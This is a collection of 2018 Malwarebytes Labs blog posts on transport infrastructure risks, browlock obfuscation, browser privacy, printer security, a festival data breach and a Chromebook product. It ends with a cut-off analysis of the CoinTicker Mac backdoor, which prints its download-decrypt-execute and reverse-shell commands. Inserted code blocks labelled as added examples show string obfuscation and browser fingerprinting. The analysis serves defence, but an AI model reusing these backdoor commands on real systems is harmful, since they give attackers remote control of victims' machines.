Techie Feeds

Compromising vital infrastructure: transport and logistics

Malwarebytes - Tue, 11/06/2018 - 18:05

Back when I was a dispatcher for a courier and trucking company, we used to joke that it only took a few strategically-placed accidents to cause a traffic jam that could completely stop circulation around the city of Rotterdam.

Rotterdam is one of the major ports in the world and consequently, there is a lot of traffic coming in and out. The roads around the city can handle normal traffic, but they get congested during rush hours and when accidents happen. If you live or work near a city, you’re probably also stuck in a traffic jam on a regular basis.

In our series about vital infrastructure, this time we’re looking at transportation. And if you think transport is not that vital, you are underestimating the logistical processes that make getting to and from different locations possible.

In this post, we will focus on the main skeleton of our logistics infrastructure: the mass transportation of goods over the surface of the earth. How do the goods that we use every day make their way into the warehouses, stores, or factories that need them? We will deal with air and public transportation separately, as they use completely different infrastructures in order to function.

Shipping by sea or ocean

A lot of the goods we consume are manufactured a long way from home. The first leg of their journey is typically made by ship across international waters. When you realize that the largest container ships can carry over 20,000 20-foot containers, you can also imagine the amount of paperwork and computing needed to get every one of those containers to the correct destination. And every one of them must go through customs—usually twice. Customs will want to know exactly what is in them, and will hold the containers until they do.

Throwing a wrench in an otherwise well-oiled machine like that can have dire consequences as Maersk, one of the largest shipping lines, learned the hard way when their organization was hit by NotPetya. Estimates of the damages done due to a “serious business interruption” were around $300 million. This interruption also caused a massive supply delay, ranging from hours to several days.

Critical information systems used during these processes could be targeted as a means to disrupt the logistics network, which can slow down or even bring to a halt an entire country’s economic system.

Trains and river shipping

Depending on existing connections and infrastructure, goods are transported in bulk from harbors to inland destinations, typically by train or barge. Unlike road transport, these modes offer few ways to route around a blocked section of the journey to the destination.

Since train and river transport are mainly used for large volumes of goods, they are also vulnerable to attacks on the administrative side. In addition, physical attack vectors can hinder transport and disrupt logistics. Some examples include:

  • Cutting the power to a rail-track
  • Disabling the railway signals
  • Disabling rail traffic management systems
  • Gaining control over sluices or other means to control the water level in rivers and canals
  • Jamming radars, so ships will have to slow down to avoid collisions

Road transport

Although one truckload is small compared to the transportation modes we have discussed so far, attacks on major delivery firms like FedEx can be highly effective. In fact, the damages due to the NotPetya infection at their TNT division were in roughly the same region as those estimated by Maersk after the same infection.

Even though trucks have more options to avoid roadblocks than trains and riverboats, huge slow-downs can be caused by tactically-employed attacks on infrastructure chokepoints such as tunnels, bridges, and highway intersections. And you don’t need to cause accidents to accomplish this. Hacking traffic control systems is a far less dangerous, and possibly more effective, means of disruption if it can be done at scale.

Special parts of the logistics infrastructure

The first part we need to consider is the container terminals. The average daily yard utilization of large container terminals in Europe is about 10,000–20,000 containers, resulting in about 15,000 movements per day. Handling a container ship of the Post Panamax size requires about 150 moves per hour, which means using five cranes that are able to handle 30 moves per hour each. Planning and keeping track of all these movements is heavily computerized and therefore vulnerable to cyberattacks.

Of the thousands of ports worldwide, only about one hundred have a global importance. These ports are an attractive target for attack.

The second part is bunkering, which is an essential part of transport. Electric trucks and ships are still a rare commodity, so most of them will need to refuel at regular intervals. Cutting off oil supplies to a country that does not have the capacity to produce enough of its own is a sure way to stifle transport and bring its economy to a standstill.


Most of the cyberattacks we have seen to date that have had a major impact on transportation systems are ransomware attacks. These infections are hard to predict and, in some cases, hard to stop. But you can be sure that the logistics infrastructure will be a target in the case of a full-scale cyberwar.

So far, awareness of this fact alone hasn’t been enough to implement adequate countermeasures—at least not adequate enough to counter a ransomware infection like NotPetya. And let’s not forget that WannaCry threw Germany’s rail network into chaos, disrupted FedEx’s delivery unit, and wreaked havoc among many others.

If this much damage can be done by a mindless ransomware attack, can you imagine what kind of destruction a targeted APT could cause? If you can hinder the enemy’s ability to move goods, supplies, and troops, that is a big advantage in warfare. This fact about military logistics was known and implemented as far back as the American Civil War (1861–65), where both armies used railways extensively for transport of personnel, supplies, horses and mules, and heavy field pieces. Both sides tried to disrupt the enemy’s logistics by destroying trackage and bridges.

Paying the price

In a line of business like logistics, where every penny counts, cybersecurity may be one of the last things managers care about. But that doesn’t make it any less important. The damage done by an organization-wide ransomware infection can put companies out of business. Having to rebuild your network while the core business has to be conducted by hand (and memory) is not just frustrating; it’s costly. Recovering from a cyberattack requires time and attention that cannot be spent on other tasks.

Keeping transportation infrastructure itself safe and secure is a government task, since it is also a matter of national security to protect these assets during a cyberattack. The technology behind our infrastructure plays an important part in determining both the logistical capabilities and the control we have over them.

Spending on critical infrastructural improvements should include cybersecurity as an important consideration. Companies in logistics, from the major shipping lines down to the local trucking companies, are aware of the important task they are fulfilling, and should not shy away from taking a good hard look at their existing security measures. Do they reflect the importance of their business to the overall economy of the region? Are they prepared to survive a ransomware attack? Is their staff trained to recognize phishing attempts? Are their computer systems protected against malware and targeted attacks?

Trust us: the first time you actually need the protection, a strong cybersecurity policy, an employee training program, and the right technical controls will already have paid for themselves many times over.

Stay safe, everyone!

The post Compromising vital infrastructure: transport and logistics appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Browlock flies under the radar with complete obfuscation

Malwarebytes - Mon, 11/05/2018 - 20:37

Browlocks are the main driving force behind tech support scams, using a combination of malvertising and clever browser locker tricks to fool users. In fact, the effects can be so convincing that people call the rogue Microsoft support number for help because they believe their computer has been hijacked.

Crooks are constantly trying out new tricks to defeat modern browsers and evade detection. Recently we’ve seen the “evil cursor” that prevents you from closing the fake alert, and the fake virus download that insinuates your computer is already infected. This time, we look at how browser locker pages use encoding to bypass signature-based detection.

Encoding and other obfuscation types

The use of Base64 or hex encoding to hide malicious scripts is as old as the moon. Malware authors have been relying on those to make identification of malicious code much more difficult for both human eyes and scanners.

Tech support scammers have been no stranger to leveraging obfuscation within their browser locker templates. For instance, by storing the fake warning message as hexadecimal escape sequences, the crooks can mask it from anyone reading the page source. The browser, however, decodes the hex content and displays it to the user as the following (fake) alert:

************************************************* RDN/YahLover.worm!055BCCAC9FEC Infection *************************************************

Not all tech support scam browlocks use obfuscation, but over the years it has become more common to see parts of the code being hidden. What we haven’t really seen is complete encoding of the browlock page such that almost no artifacts are present.

Soup to nuts encoding

We recently came upon a browlock template reported on Reddit that has taken encoding to a whole new level, on top of using the existing, still unpatched browser locker techniques mentioned above. The page’s source code is beautifully simple and yet effective.

We can see two JavaScript libraries being retrieved. One is Zepto.js, which according to its author is “a minimalist JavaScript library for modern browsers with a largely jQuery-compatible API.” The more interesting one is a base64.min.js file, which takes Base64-encoded content and decodes it on the fly. Note that this data is not embedded in the main page but is fetched by a subsequent GET request.

There is no denying that crooks are once again playing cat and mouse with defenders. Perhaps as a tongue-in-cheek gesture, they even created a bogus Google Analytics tracker ID, gtag('config', 'UA-8888888-x'), in addition to using the Google look-alike domain maps-google[.]us.
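The mechanics described above, as an added example rather than code from the post or from the scam page it analyzes: the first half shows how a browlock template can hide its warning text behind hex escapes and a Base64 blob so that the plaintext never appears in the page source; the second half is the normalization step a scanner needs to perform before applying plaintext signatures. The sample page, the signatures, and the helper names are constructed for this example; only the alert string is the one shown in the post.

```javascript
// Added example (not from the Malwarebytes post). Shows how encoding hides
// browlock text from signature matching, and how decoding layers first
// restores detection. Sample page and signatures below are constructed.

const WARNING = "RDN/YahLover.worm!055BCCAC9FEC Infection";

// --- the scam side: hiding a string -------------------------------------
function toHexEscapes(s) {
  // "A" -> "\x41"; the browser evaluates the escapes back to plain text.
  return Array.from(s, (c) => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

function toBase64(s) {
  return Buffer.from(s, "utf8").toString("base64");
}

// A page the way a crawler sees it: the warning text is never present in clear.
const SAMPLE_PAGE = [
  `<script>document.title = "${toHexEscapes(WARNING)}";</script>`,
  `<script src="base64.min.js"></script>`,
  `<script>var payload = "${toBase64("<h1>" + WARNING + "</h1><p>Call support now</p>")}";`,
  `document.body.innerHTML = Base64.decode(payload);</script>`,
].join("\n");

// --- the defender side: undoing it ---------------------------------------
// Plaintext signatures such as a scanner might carry for this template family.
const SIGNATURES = [/YahLover\.worm/i, /\bInfection\b/];

function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function decodeBase64Blobs(text) {
  // Quoted runs of Base64 alphabet (16+ chars). Only substitute the decoded
  // form when it is printable text, so binary blobs are left untouched.
  return text.replace(/"([A-Za-z0-9+\/]{16,}={0,2})"/g, (match, b64) => {
    const decoded = Buffer.from(b64, "base64").toString("utf8");
    return /^[\x20-\x7e\s]+$/.test(decoded) ? `"${decoded}"` : match;
  });
}

function normalize(text, maxRounds = 3) {
  // Peel layers until nothing changes (hex inside Base64, Base64 inside hex, ...).
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeBase64Blobs(decodeHexEscapes(current));
    if (next === current) break;
    current = next;
  }
  return current;
}

function matchSignatures(text) {
  return SIGNATURES.filter((re) => re.test(text)).map((re) => re.source);
}

function scan(page) {
  // Raw matching misses everything; matching after normalization catches it.
  return { raw: matchSignatures(page), normalized: matchSignatures(normalize(page)) };
}

console.log(JSON.stringify(scan(SAMPLE_PAGE), null, 2));
```

The bounded decode loop matters: a real page may nest one encoding inside another, and a scanner that only strips a single layer is defeated by the next template revision. The printable-text check keeps the normalizer from mangling legitimately Base64-encoded images or fonts.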

For end users, it is important to remember that no matter how scary a warning looks or even sounds, the best course of action is to remain calm and take the time to check on it before overreacting and dialing a scammer’s hot line. These browlocks are not causing any damage to the computer and can be closed one way or another. The more annoying ones still require using the Task Manager to kill the offending process, which is why we hope browser vendors take these issues seriously to restore power to the user. But otherwise, taking time to investigate does no harm, no foul.

Malwarebytes Browser Extension is not fooled by this obfuscation trick and already protects users from this browlock.

The post Browlock flies under the radar with complete obfuscation appeared first on Malwarebytes Labs.

A week in security (October 29 – November 4)

Malwarebytes - Mon, 11/05/2018 - 17:37

Last week on Malwarebytes Labs, we looked at a rogue cryptocurrency app installing backdoors, took a dive into the world of printer security, explored browser privacy tweaks, highlighted a music festival–themed breach, and introduced Malwarebytes for Chromebook.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (October 29 – November 4) appeared first on Malwarebytes Labs.

Introducing Malwarebytes for Chromebook

Malwarebytes - Thu, 11/01/2018 - 15:00

Have you been thinking about switching over to Chromebook because you don’t need all the built-in software programs of a PC or the sleek design of a Mac? Or perhaps you’ve already made the jump because Chromebooks are so much cheaper than a Windows or Mac system. Either way, did you worry that you would miss using Malwarebytes? You no longer need to be afraid!

Malwarebytes for Chromebook

We are proud to present to you Malwarebytes for Chromebook. In Malwarebytes’ quest for a malware-free existence, we want to provide security for as many computers, devices, and endpoints as possible. Offering a product that protects and cleans Chromebooks from malware is only a natural next step in that process.

Chromebooks are up and coming in the market due to their lower production costs associated with a reduced need for top-of-the-line hardware. (Translation: They’re much cheaper than other computers.) Chromebooks store their data in the cloud so they don’t need big, fast hard drives. And since you can’t run any heavy games on them, they don’t need a fast CPU or a heavy duty graphics card either—which means they likely won’t be targets for malicious cryptomining. Bonus!

Chromebooks are also user friendly. If you can use a browser, you can use a Chromebook, so to speak. This makes them a good choice for people who are new to computers, from school-age children to older adults picking up a computer for the first time. But they also make for a good alternative to expensive laptops used in the workplace. If employees rely heavily on the cloud or use only web-based apps anyway, it makes sense to save costs and make the switch.

What is Malwarebytes for Chromebook?

Malwarebytes for Chromebook offers Chromebook users protection by blocking scams, protecting your privacy, and scanning for malware. It’s capable of detecting threats such as ransomware, potentially unwanted programs (PUPs), and adware. Your Chromebook is protected by design against the regular threats that face Windows and Mac users, but it is susceptible to the same threats as Android systems. And that is where Malwarebytes for Chromebook can help you.

Why do you need Malwarebytes for Chromebook?

Even though Chromebooks come with built-in defense mechanisms like sandboxing, verified boot, and recovery mode, they can still get infected. Malwarebytes for Chromebook does not slow down your lean, mean Chromebook machine. It does stand guard over your privacy and data security while protecting you against ransomware, adware, and other modern-day malware.

How does Malwarebytes for Chromebook work?

Malwarebytes for Chromebook’s features focus on both protection and remediation. It:

  • Detects and blocks ransomware before it can execute and lock down the device.
  • Conducts a comprehensive privacy audit, identifying the access privileges of every app on your Chromebook device so you know exactly which information you’re sharing.
  • Finds and removes adware and other malware. It searches all the files and apps quickly and effectively for malware or potentially unwanted programs such as screen lockers or adware.

Easy on the eyes

Malwarebytes for Chromebook provides the user with easy-to-understand information about the device’s security status in an interface that’s clean and simple. Users that are familiar with Malwarebytes for Android will recognize the popular UI design.

Where can I get Malwarebytes for Chromebook?

Malwarebytes for Chromebook is only supported on Chromebooks with Google Play Store access.

Information about the available versions and languages can be found on our product page. You can download and install Malwarebytes for Chromebook from the Google Play Store. If you need help, you can ask questions on our forums or contact our Support team.

Even when using alternative, cost-savings devices, Malwarebytes believes you have the right to protect your privacy, as well as be protected from threats like malware. Cybercriminals won’t discriminate based on the machine you use. Your personal data, login credentials, and credit card information are just as valuable to them. So stay safe, everyone! Even—or rather, especially—on your Chromebook.

The post Introducing Malwarebytes for Chromebook appeared first on Malwarebytes Labs.

Tomorrowland festival goers affected by data breach

Malwarebytes - Wed, 10/31/2018 - 17:27

Tomorrowland, a major international music festival, has revealed a data breach potentially affecting around 60,000 attendees.

This one is a little different though, as the data accessed without permission isn’t recent. In fact, it dates back four years to an event long since come and gone. According to a Tomorrowland spokesperson, the managers of the Paylogic ticketing system noticed “unusual activity” on an older server. This server contained data for the 2014 event, but the hackers left everything else alone.

“Sensitive” versus “not sensitive”

The hacked server is now offline, and anyone potentially affected should have been made aware of what’s going to happen next. As with most breaches, it involves notification emails and a helpful set of suggestions for cybersecurity best practices.

Accounts conflict about what specifically was breached, accessed, and stolen in the Tomorrowland attack. This may be because the primary news sources are in languages other than English, with details being lost in translation.

Tomorrowland representatives claim access to sensitive data did not take place. This is where things become reliant on your personal definition of what constitutes “bad” or merely “sort of bad.”

Data taken includes name, email, gender, age, and post code. Data not taken includes payment details, passwords, and addresses.

I suspect everyone’s mileage may vary greatly with regards to what constitutes “sensitive data” here. Depending on which region of the world you come from, a post code alone could drill you down to a couple of houses or a single street. At that point, the specific address probably doesn’t matter too much. With the post code and a name, you could easily find the exact house via publicly-listed information, a voting register, or a house sale.

That seems pretty sensitive to me.

Phishing risks

A convincing phishing campaign is more than doable with the data taken by the attackers. Any communications regarding ticket sales, offers, promotions, or anything else you can think of should be greeted with a healthy dose of suspicion.

Revisit your mailbox and check for any interactions with event organisers the moment you receive any official communications. Have a look at anything you’ve replied to related specifically to Tomorrowland. In particular, pay attention to anything involving payments, password resets, or submission of further personal information. Ignore all rogue emails and send them straight to the recycling bin.

Without further information on when the breach took place, it’s difficult to say how long people should be concerned. We don’t know if the unauthorised access took place last week, last month, or last year. We can’t say how long people were sitting on the stolen information, or if it’s old news for scammers. Potentially, anything worthwhile in the haul has long since stopped being relevant or useful.

Pulling the plug: a good idea

It’s odd that a server containing data from a one-off event in 2014 was still online. Despite this, it’s entirely possible it was online for specific reasons we can’t guess at. Even so, it’s a good cautionary warning to remind admins to take anything offline that doesn’t really need to be there. Even data that should definitely be online for various reasons will often fall victim to attacks and scams.

A full audit, a sensible backup policy, and old data stored securely will solve a lot of these potential headaches. Everybody likes a music festival to be as eventful as possible, but this is perhaps a little too eventful. We hope you experience zero breaches, sensibly priced burgers, and permanently short queues for an abundance of portable toilets.

The post Tomorrowland festival goers affected by data breach appeared first on Malwarebytes Labs.

How to tighten security and increase privacy on your browser

Malwarebytes - Wed, 10/31/2018 - 16:41

Is my browser making an effort to keep my system safe and my online behavior private? This is usually not the first question we ask ourselves when we choose our default browser. But maybe it should be.

These days, threats to your privacy and security come at you from all angles, but browser-based attacks such as malvertising, drive-by downloads, adware, tracking, and rogue apps make going online and conducting a search a little more dangerous. Therefore, it’s important to take note of what browsers are doing to shore up their defenses—and what you can do to optimize them.

When it comes to online privacy, it looks as if the silent majority of Internet users have shifted from the “I have nothing to hide” frame of mind to the “they already know everything anyway” group. And based on recent events, many social media users might be right. Effectively, both groups feel as though it is not worth the trouble to jump through hoops to keep their data private. So should this even be a consideration?

While privacy is ultimately a personal choice, we believe it is still a right. So we’ll continue to offer our advice for those who are interested.

But let’s look at the security aspect first. This is something we can all agree on.

Browser security measures

There have been a few initiatives taken recently by the major browsers to enhance their safety.

  • Google has decided that Chrome extensions submitted to the Web Store will no longer be allowed if they contain “obfuscated” code. According to Google, developers should not have to hide their code: obfuscation makes it hard to decide whether an extension should be allowed, and the majority of the malicious or policy-violating extensions Google blocks contain obfuscated code.
  • Google is in the process of putting an end to “inline installation” of extensions. This means websites can no longer directly install Chrome extensions using the Chrome API, but have to send you to the Web Store. While this process will only be finished by the end of the year, distributors have already adapted their methods to deliver their extensions.
  • Mozilla (Firefox), Google (Chrome), Apple (Safari), and Microsoft (Edge and Internet Explorer) have announced that they will drop support for the TLS (Transport Layer Security) 1.0 and 1.1 protocols in early 2020. This will force websites to move to the newer and more secure TLS 1.2 and 1.3.
  • WebRTC leaks were addressed. Real-time communication features could expose your true IP address via STUN requests in Firefox, Chrome, Opera, and Brave, even when you were using a VPN.

In earlier stages of privacy and security audits, all the major browsers had already added options and features like URL filtering, download protection, “do not track” capabilities, and measures against browlocks. They are not all using the same methods, and some are more effective than others, but the efforts were made nonetheless.

Remaining problems

Despite all the attempts to apply some pest-control on adware, malicious cryptominers, and other assorted browser hijackers, there will always be those that manage to slither through and infect users. And that doesn’t even take into account the multitude of potentially unwanted programs (PUPs) that most parties don’t even seem to care about at all. However, readers of this blog will undoubtedly know the way to our Malwarebytes products page, where they can download a cure for an infected browser.

Besides the obvious ramifications of an adware, PUP, or hijacker infection, there is still more work to do for those of us who value our online privacy.

Browser privacy

The upside of being able to use browser extensions is that there are many good ones out there that can help you establish a more private browsing experience. Ad-blockers, anti-tracking tools, and protective extensions add further protection.

You can also tighten your privacy by using a Virtual Private Network (VPN) to mask your IP address from the sites you visit and shield your traffic from your local network and ISP. You have options here: you can install a VPN client that tunnels all your Internet traffic, or a VPN browser extension that covers your browser only. Since a VPN adds some latency, the choice depends on what else you use your connection for and on personal preference.

You could even decide to use one browser with a VPN extension and another without one. Personally, I use different browsers for different purposes. This is called compartmentalization and it allows you to visit trusted (and preferably bookmarked) websites with a quick browser and do your regular surfing with a fully protected and anonymized browser.

Besides using a VPN, you can also look at some alternative browsers that are already optimized for privacy and security:

  • Tor Browser protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world.
  • Freenet is a peer-to-peer platform for censorship-resistant communication and publishing that is available for Windows, macOS, and Linux.
  • Waterfox is a secure and private browser based on Firefox, that allows you to use Firefox extensions. It is available for Windows, macOS, Linux, and Android.
  • Pale Moon is another Mozilla fork, but it doesn’t work with all Firefox extensions. It is available for Windows and Linux.
  • Brave is a Chromium-based browser that blocks unwanted content by default and does not need much tinkering to keep you safe and private. Brave is available for Windows, macOS, Linux, iOS, and Android.

Anonymous searching

We have talked about (not so) private search extensions before, but I want to mention a search engine that does deliver on the promised private searches, and that was brought up in the comments to that blogpost (thanks Patrick). It is called DuckDuckGo, and you can perform searches directly from their site or you can install their app or extension.

Test to see whether your browser is safe against fingerprinting

Browser fingerprinting is a method used by commercial websites to uniquely identify visitors based on the way you have configured your browser and some other metrics that they can fetch from your browser, such as timezone.

If you feel you have already done your best to make your browser untrackable, pay a browser-fingerprinting test site a visit. Such a site lets you run a test that analyzes how well your browser and add-ons protect you against online tracking techniques. It will also tell you whether your system is uniquely configured, and therefore identifiable, even if you are using privacy-protective software.

Don’t get hung up on the test result alone though, because the number of results you are compared with plays a big role in the outcome. For example, coming from a small country or language area may give you away when no one else from that area has taken the test. This doesn’t automatically mean advertisers will be able to track you as well. Do pay attention to the specified fingerprinting results. You can access those by clicking on the fingerprinting link in the Test column.
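To make the two points above concrete (how a fingerprint is derived from browser attributes, and why the uniqueness score depends on who you are compared against), here is an added example. It is not code from the post or from any fingerprinting test site: the attribute list, the hash, the population of "visitors," and the helper names are all constructed for this illustration. In a real fingerprinting script the values come from navigator.*, screen.*, Intl.DateTimeFormat().resolvedOptions() and similar APIs; here they are hard-coded so the example runs offline.

```javascript
// Added example (not from the Malwarebytes post). Derives a fingerprint from
// browser attributes and measures how identifying each attribute is against a
// given population. All attribute values and the population are constructed.

const ATTRIBUTE_KEYS = ["userAgent", "language", "timezone", "screen", "fonts", "doNotTrack"];

function canonicalize(attrs) {
  // Fixed key order and a separator that cannot occur in values, so the same
  // configuration always produces the same string.
  return ATTRIBUTE_KEYS.map((k) => `${k}=${String(attrs[k] ?? "")}`).join("\u001f");
}

function fnv1a32(str) {
  // Small non-cryptographic hash; a real tracker would typically use a
  // cryptographic hash, but any stable digest of the canonical string works.
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h.toString(16).padStart(8, "0");
}

function fingerprint(attrs) {
  return fnv1a32(canonicalize(attrs));
}

// Identifying information each attribute carries against a population that
// includes the visitor: log2(N / visitors sharing the value). 0 bits means
// everyone shares it; log2(N) bits means the visitor is alone.
function surprisalBits(population, attrs) {
  const n = population.length;
  const bits = {};
  for (const k of ATTRIBUTE_KEYS) {
    const value = String(attrs[k] ?? "");
    const same = population.filter((p) => String(p[k] ?? "") === value).length;
    bits[k] = Math.log2(n / Math.max(same, 1));
  }
  return bits;
}

function isUniqueIn(population, attrs) {
  const fp = fingerprint(attrs);
  return population.filter((p) => fingerprint(p) === fp).length <= 1;
}

function report(population, attrs) {
  return { unique: isUniqueIn(population, attrs), bits: surprisalBits(population, attrs) };
}

// Constructed population: a common configuration, with one attribute varied
// per visitor. The visitor under test differs only in timezone.
const COMMON = {
  userAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/63.0",
  language: "en-US",
  timezone: "America/New_York",
  screen: "1920x1080x24",
  fonts: "Arial,Verdana,Times New Roman",
  doNotTrack: "1",
};
const OTHERS = [
  { ...COMMON },
  { ...COMMON },
  { ...COMMON, language: "en-GB" },
  { ...COMMON, screen: "1366x768x24" },
  { ...COMMON, fonts: "Arial,Verdana" },
  { ...COMMON, doNotTrack: "unspecified" },
  { ...COMMON, userAgent: "Mozilla/5.0 (X11; Linux x86_64) Firefox/63.0" },
];
const VISITOR = { ...COMMON, timezone: "Europe/Amsterdam" };

// Same visitor, two populations: in the first nobody shares the timezone, in
// the second everybody does, and the "unique" verdict flips accordingly.
const SMALL_SAMPLE = [...OTHERS, VISITOR];
const DUTCH_SAMPLE = [...OTHERS.map((p) => ({ ...p, timezone: "Europe/Amsterdam" })), VISITOR];

console.log(JSON.stringify(report(SMALL_SAMPLE, VISITOR)));
console.log(JSON.stringify(report(DUTCH_SAMPLE, VISITOR)));
```

Against the small sample the timezone alone contributes log2(8) = 3 bits and the visitor is unique; against the sample where everyone shares that timezone it contributes 0 bits and the same configuration is no longer unique. That is exactly why a test site's verdict says more about its visitor pool than about what an advertiser with a much larger pool can do, and why the per-attribute results are the part worth reading.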

Blocking advertisements

As we have explained in the blogpost Everybody and their mother is blocking ads, so why aren’t you?, blocking advertisements provides a vital security layer that not only severs a potential vector for online malvertising attacks, but also blocks privacy-invading tracking plugins from collecting and harvesting your personal information.


Cookies are another topic that we have discussed earlier. Most cookies are not worth worrying about, but it is a good idea to be aware of them. How could you not be aware with every site asking your permission, right? In the blogpost Cookies: Should I worry about them?, we have explained how you can check and control the cookies that you want to allow.

Level of concern

So, while many major browsers are doing their best to keep you secure and private, it depends on your own level of concern how far you want to take this journey. There are specialized browsers, extensions, search engines, and other tools to help you achieve any level of privacy. Most people will be satisfied by customizing their mainstream browser to fit their needs, while others wouldn’t think of going online unless they are using Tor behind a VPN. To each their own. As long as you are aware of the risks. And we hope this post will help you to achieve the level you are after.

Stay safe, everyone!

The post How to tighten security and increase privacy on your browser appeared first on Malwarebytes Labs.

Removing the jam in your printer security

Malwarebytes - Tue, 10/30/2018 - 16:00

Printers are an important, invisible—albeit sometimes loud—component of the office. But all too often they’re filled with mystery meat icons, peculiar blinking lights, or error messages with no instruction manual to hand. No problem, you can just print at the next station!

Wrong. Printers are networked devices that touch multiple parts of your network. So not only are you stopped from printing that healthcare policy form you had to sign, but now you have to wonder: what else may have been intercepted?

This frustration with basic printer/hybrid device operations usually spills over into the workplace with detrimental results. When basic functionality remains a mystery, it can cause plenty of issues elsewhere. In an age of hackable online toasters and home security systems keeping people out of their homes during maintenance, it’s no wonder we forget some of the more mundane perils sitting closer to home.

But wait…printers?!

Don’t think that printers just come out of the box fully secured and ready to roll. You’re probably going to have to do some configuring, both for the printer and any devices that make use of it. Not to mention, there’s physical security to consider, too.

There are a number of ways printers can cause problems for security, and in a few cases they don’t even need to be online. Roughly 80 percent of US offices are open floor plan now, and more often than not, printers and their contents are left lying around for all to access. Something as basic as a poorly-implemented office layout could cause issues by essentially giving dozens of employees physical access to sensitive documents—and that’s just one of the perils to consider.

Outside of physical access, there are also network-facing vulnerabilities, which means an admin needs to keep printer firmware updated and apply all available patches. In addition, accidental or deliberate leaks of scanned or printed documents are an area of concern for highly sensitive content, such as paychecks, or the valuable proprietary information of high-profile targets.

You may not have even considered your printer to be a security issue up to this point, but we’re not making this up. Default settings have allowed printers to serve as anonymous file storage for malicious use. Elsewhere, 150,000 printers worldwide were compromised to “raise awareness of exposed printers.” Got a printer with extras like the ability to fax, turning back the clock to 1991? Whoops: a malicious fax can help take over a PC.

If this is all horribly new to you, don’t worry. We’ll lead you through some of the most common security flash points for printers and hopefully point you in the right direction. 

Physical security: for your convenience?

The whole point of a printer in the office is that anyone can use it, no matter which floor they’re located on, or even if they work from home. It’s not exactly uncommon for someone to be the sole person responsible for printing a document that somebody a few hundred miles away needs to receive. But how can you guarantee the correct recipient is standing in front of the tray when the document leaves the device? And what can you do to ensure the data is securely encrypted while it travels inside your network?

The good news is, a lot of this functionality is now built into modern printers so you can plan accordingly. Many models offer various levels of physical security to accommodate your requirements.

For example, you may want a secure lock on your paper tray if the paper inside is to be used for something business critical. Or how about a variety of watermark-style patterns appearing when unauthorised printing occurs?

Some manufacturers offer up secure pull printing, where the documents won’t be released from the printer queue without the correct recipient presenting a PIN, or an ID card, or even a QR code. This means no sensitive documents lying around in a tray for anyone to pick up, and—bonus—it even helps the environment by not spilling wasted paper all over the place.

Manufacturers might also provide encryption for wherever the document is stored in the print queue, whether on site or in the cloud, and offer encryption for every step of the document’s journey across the network.

With these types of processes in place, you may not need to worry about additional security measures of a slightly less hi-tech variety. These may include:

  • Making staff top up ID cards with “printing funds” to ensure lack of paper waste and rogue prints lying all over the place
  • Installing the printer in a secure, lockable room with CCTV
  • Restricted access to certain types of paper used for money wires or billing/expense claims

If you’re stuck with a printer model that doesn’t do most or all of the above, these are the backup measures you’ll want to keep in mind. 

Locking down digital files and network authentication

You won’t find many printers lacking the ability to scan, and while locked-down print jobs are all well and good, there’s an obvious risk from paper files becoming digital ones, which could then be sent to all and sundry.

This is why some devices offer services such as locking down PDF scans, which usually involves automatically placing a password onto the file: to open it, you’ll need to have authorisation to receive the password in the first place. Others will even encrypt the scan, adding to a general overall sense of “This probably won’t end up on eBay.” If you need a device to allow some forms of protocol but deny others, or operate within certain network security policies, there are some that can potentially do that too (browse to Section 3).

At the top end of printing hardware, the devices can do everything from ensuring BIOS integrity and whitelisting to running real-time intrusion protection. This is quite a way off from me feeling reasonably accomplished when freeing up my tenth paper jam of the day, but the increased complexity in device security is definitely worth it for organisations in need of paper trails, auditing, and locking down every last inch of their potential attack surface.

Memory retention: all in the mind

Modern printers tend to have a bit of storage space rattling around in their plastic casing, alongside support for USB sticks and memory cards. The good news is, the bulk of it is temporary and is supposed to vanish in a puff of smoke (hopefully not literal smoke, or you have a whole new set of problems to worry about) when you unplug the device.

Even so, if you’re going to dispose of a printer, you’ll want to make sure you’ve done a few things. First: remove all external storage such as USB sticks and memory cards. After that, check the manual and see exactly what kind of storage is included in the hardware and how you wipe it. The chances of anyone coming across your old printer and trying to reconstruct or extract content from it is extremely remote, so this is an absolute last step.

10 percent ink remaining

There’s a lot to think about where printer security is concerned, along with a few special considerations. The near endless stream of people having to use a handful of devices across an organisation on a daily basis is unique, and presents additional worries where social engineering and insider threats are concerned. Some of the more rock solid security solutions for printers can be rather expensive, and not everyone has a budget to accommodate those kinds of purchasing decisions.

Having said that, even if you can’t drag the latest and greatest technology into the office, you can certainly come up with a few Plan B’s like some of those listed up above. Once you realise how vulnerable an insecure printer on the network can be, something is most definitely better than nothing.

The post Removing the jam in your printer security appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mac cryptocurrency ticker app installs backdoors

Malwarebytes - Mon, 10/29/2018 - 17:20

An astute contributor to our forums going by the handle 1vladimir noticed that an app named CoinTicker was exhibiting some fishy behavior over the weekend. It seems that the app is covertly installing not just one but two different backdoors.


The CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to someone who has invested in cryptocurrencies. Once downloaded, the app displays an icon in the menu bar that gives information about the current price of Bitcoin.

The app’s preferences allow the user to customize the display, showing information about a wide variety of cryptocurrencies, including Bitcoin, Ethereum, and Monero.

Although this functionality seems to be legitimate, the app is actually up to no good in the background, unbeknownst to the user. Without any signs of trouble, such as requests for authentication to root, there’s nothing to suggest to the user that anything is wrong.

When launched, however, the app downloads and installs components of two different open-source backdoors: EvilOSX and EggShell.

The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS:

nohup curl -k -L -o /tmp/.info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/ -k 111111qq; python /tmp/

The first part of the command downloads an encoded file from a Github page belonging to a user named “youarenick” and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named Finally, it executes the resulting Python script.

The script performs multiple tasks. First it opens a reverse shell connection to a command & control server, using the following command:

nohup bash &> /dev/tcp/ 0>&1

(The domain resolves to this IP address.)

Next, it downloads the EggShell mach-o binary, saving it to /tmp/espl:

curl -k -L -o /tmp/espl

